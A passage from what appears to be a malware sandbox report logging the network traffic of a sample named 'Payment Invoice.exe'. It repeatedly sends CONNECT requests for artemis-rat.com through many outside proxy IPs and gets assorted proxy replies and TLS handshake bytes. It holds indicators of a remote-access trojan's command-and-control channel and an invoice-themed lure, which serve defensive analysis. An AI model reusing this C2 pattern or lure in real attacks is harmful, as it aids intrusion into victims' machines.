                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1086192.168.2.453071175.183.82.22181937076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.297143936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1087192.168.2.453180119.196.168.183807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.297198057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1088192.168.2.453257184.169.154.119807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.309549093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.488409996 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0
                                                                Mar 11, 2024 16:15:19.489537954 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ef 20 06 dc 95 74 15 a6 64 12 78 92 88 87 1b 6c 3c 9a ce d8 c5 02 db 24 fb 25 b8 e4 c7 55 94 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                Data Ascii: lhe tdxl<$%U*,+0/$#('=<5/artemis-rat.com#Ix7:^N.DAE%D1&q$nu+)|\hi7-]i&$G
                                                                Mar 11, 2024 16:15:19.663064003 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 07 74 75 4d ee b2 a1 ab e6 f8 49 c8 69 73 72 29 86 35 ab 8f 2f 54 f8 19 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                Data Ascii: =9tuMIisr)5/TDOWNGRD0000*H010Uartemis-rat.com0240311141528Z260311141528Z010Uartemis-rat.com0"0*H0Ob-F>Ce2
                                                                Mar 11, 2024 16:15:19.664344072 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 ae f4 06 22 0e 9b c1 51 8b c0 50 5f e7 fe a7 10 b5 84 30 76 c0 98 db aa 00 f9 40 2d 89 49 97 60 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 81 ba cd 03 bf b3 b3 83 cc 61 0b 81 21 d9 41 42 84 22 b6 d4 12
                                                                Data Ascii: %! "QP_0v@-I`(a!AB"up<[v
                                                                Mar 11, 2024 16:15:19.836766005 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 3a 7a 28 96 53 4c 78 b9 b4 85 74 40 3e 30 c5 4a b6 43 29 c8 88 cf 06 00 99 f6 ef d6 62 99 cb 46 36 b8 1f ab c7 77 2e d4
                                                                Data Ascii: (:z(SLxt@>0JC)bF6w.


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1089192.168.2.453267184.72.36.89807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.312553883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.488471985 CET344INHTTP/1.1 403 Forbidden
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Server: Apache
                                                                Content-Length: 199
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1090192.168.2.45318131.134.151.40807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.315020084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1091192.168.2.453284162.159.241.12807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.316687107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.482563019 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1092192.168.2.453291104.23.128.174807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.318330050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.473067045 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1093192.168.2.452617203.124.53.12256787076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.321026087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1094192.168.2.453175116.199.168.141457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.327584028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1095192.168.2.45320672.206.181.105649357076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.359054089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1096192.168.2.45262614.116.188.18231287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.370744944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.929352045 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1097192.168.2.452708162.214.121.1129937076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.371408939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.385176897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.442153931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.480168104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:43.479882956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:55.479856014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:07.589988947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:31.589246035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1098192.168.2.453188211.222.252.18781977076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.371714115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1099192.168.2.451368103.90.227.24431287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.384562016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.527070045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.527120113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.526998043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:43.526734114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:03.206695080 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1100192.168.2.451400102.213.223.46837076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.387257099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.562375069 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1101192.168.2.45262231.211.142.11581927076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.390487909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1102192.168.2.45321261.79.73.225807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.390789986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1103192.168.2.45325846.51.249.13531287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.405347109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.675151110 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1104192.168.2.453241115.84.248.14080807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.455539942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.765947104 CET1286INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                X-Powered-By: PHP/5.6.40
                                                                Cache-Control: max-age=0, no-cache, no-store, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                Content-Length: 3172
                                                                Content-Type: text/html; charset=UTF-8
                                                                Data Raw: 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 54 68 65 20 55 6e 69 66 6f 72 6d 20 53 65 72 76 65 72 20 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 44 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 65 20 55 6e 69 66 6f 72 6d 20 53 65 72 76 65 72 20 5a 65 72 6f 20 31 31 2e 32 2e 30 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 65 20 55 6e 69 66 6f 72 6d 20 53 65 72 76 65 72 2c 20 4d 50 47 2c 20 4d 69 6b 65 20 47 6c 65 61 76 65 73 2c 20 52 69 63 2c 20 55 6e 69 53 65 72 76 65 72 2c 20 4f 6c 61 6a 69 64 65 2c 20 42 6f 62 53 20 22 20 2f 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 2f 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2f 0d 0a 2e 69 6e 74 72 6f 7b 0d 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 33 30 70 78 3b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 0d 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 45 37 45 37 46 44 3b 0d 0a 7d 0d 0a 2f 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2f 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 3c 64 69 76 20 69 64 3d 22 77 72 61 70 22 3e 0d 0a 20 20 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 0d 0a 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 75 6e 69 66 6f 72 6d 73 65 72 76 65 72 2e 63 6f 6d 22 3e 3c 69 6d 67 20 73 72 63 3d 22 69 6d 61 67 65 73 2f 6c 6f 67 6f 2e 70 6e 67 22 20 61 6c 69 67 6e 3d 22 6c 65 66 74 22 20 61 6c 74 3d 22 54 68 65 20 55 6e 69 66 6f 72 6d 20 53 65 72 76 65 72 22
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><title>The Uniform Server </title><meta name="Description" content="The Uniform Server Zero 11.2.0" /><meta name="Keywords" content="The Uniform Server, MPG, Mike Gleaves, Ric, UniServer, Olajide, BobS " /><link rel="stylesheet" type="text/css" href="css/style.css" media="screen" /></head><style type="text/css">/*****************************************/.intro{ margin-top:30px; padding:10px; font-size:12px; font-family:Verdana; background-color: #E7E7FD;}/*****************************************/</style><body><div id="wrap"> <div id="header"> <a href="http://www.uniformserver.com"><img src="images/logo.png" align="left" alt="The Uniform Server"
                                                                Mar 11, 2024 16:15:20.140194893 CET454INHTTP/1.1 400 Bad Request
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                Content-Length: 226
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1105192.168.2.452190192.252.220.8941457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.456170082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
